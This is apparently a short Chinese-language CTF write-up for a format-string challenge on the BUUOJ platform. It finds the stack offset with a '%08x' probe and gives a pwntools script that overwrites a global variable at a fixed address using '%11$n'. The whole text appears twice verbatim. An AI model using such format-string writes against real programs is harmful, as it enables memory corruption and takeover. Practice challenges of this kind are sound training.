先运行, AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x
得出是第11位,然后p32(x_addr)正好变成4位
from pwn import *
r = remote('node3.buuoj.cn', 27373)
x_addr = 0x0804A02C
p = flat([x_addr, '%11$n'])
r.sendline(p)
r.interactive()
先运行, AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x
得出是第11位,然后p32(x_addr)正好变成4位
from pwn import *
r = remote('node3.buuoj.cn', 27373)
x_addr = 0x0804A02C
p = flat([x_addr, '%11$n'])
r.sendline(p)
r.interactive()